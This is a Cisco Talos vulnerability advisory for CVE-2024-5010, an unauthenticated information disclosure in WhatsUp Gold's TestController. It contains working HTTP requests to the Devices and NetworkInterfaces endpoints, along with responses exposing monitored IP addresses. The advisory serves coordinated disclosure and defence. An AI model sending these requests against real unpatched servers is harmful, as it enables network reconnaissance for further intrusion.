Talos IntelligenceTALOS-2024-1933Progress Software Corporation WhatsUp Gold TestController multiple information disclosure vulnerabilities
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.6 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
15.7%
Talos Vulnerability Report
TALOS-2024-1933
Progress Software Corporation WhatsUp Gold TestController multiple information disclosure vulnerabilities
June 26, 2024
CVE Number
CVE-2024-5010
SUMMARY
An information disclosure vulnerability exists in the TestController functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697
PRODUCT URLS
WhatsUp Gold - <https://www.whatsupgold.com/>
CVSSv3 SCORE
7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE
CWE-200 - Information Exposure
DETAILS
WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.
The TestController endpoint is available to unauthenticated users and it discloses sensitive information through certain actions.
CVE-2024-5010 - Devices Information Disclosure
One of the TestController action sensitive informations disclosed do unauthenticated users is Devices. By sending the following request :
REQ
GET /NmConsole/Wug/Test/Devices HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.0.252/NmConsole/
An attacker can obtain a list of detected and monitored devices by WhatsUp Gold:
RESP
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=vgfdfd4wiw4ab505tf11yl0z; path=/; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 08 Dec 2023 16:05:05 GMT
Connection: close
Content-Length: 488
[{"id":1,"name":"DESKTOP-XXXX","bestState":6,"worstState":6},{"id":2,"name":"192.168.0.26","bestState":6,"worstState":6},{"id":3,"name":"192.168.0.1","bestState":6,"worstState":6},{"id":4,"name":"192.168.0.2","bestState":6,"worstState":6},{"id":5,"name":"192.168.0.20","bestState":6,"worstState":6},{"id":6,"name":"192.168.0.55","bestState":6,"worstState":6},{"id":7,"name":"192.168.0.186","bestState":10,"worstState":10}]
Exposing such sensitive information to an attacker without proper authentication can be leveraged and exploited in further attacks.
CVE-2024-5010 - NetworkInterfaces Information Disclosure
Another of the TestController action sensitive informations disclosed do unauthenticated users is NetworkInterfaces. By sending the following request :
REQ
GET /NmConsole/Wug/Test/NetworkInterfaces HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.0.252/NmConsole/
An attacker can obtain a list of detected and monitored network interfaces by WhatsUp Gold:
RESP
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=l1azryxvh4my4gm3zh23ieu4; path=/; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 08 Dec 2023 16:11:50 GMT
Connection: close
Content-Length: 249
[{"id":1,"name":"192.168.0.26"},{"id":2,"name":"192.168.0.252"},{"id":3,"name":"192.168.0.1"},{"id":4,"name":"192.168.0.2"},{"id":5,"name":"192.168.0.20"},{"id":6,"name":"192.168.0.55"},{"id":7,"name":"192.168.0.186"},{"id":8,"name":"192.168.0.56"}]
Exposing such sensitive information to an attacker without proper authenticaton can be leveraged and exploited in further attacks.
TIMELINE
2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release
Credit
Discovered by Marcin ‘Icewall’ Noga of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2024-1932
Previous Report
TALOS-2024-1934
Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.6 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
15.7%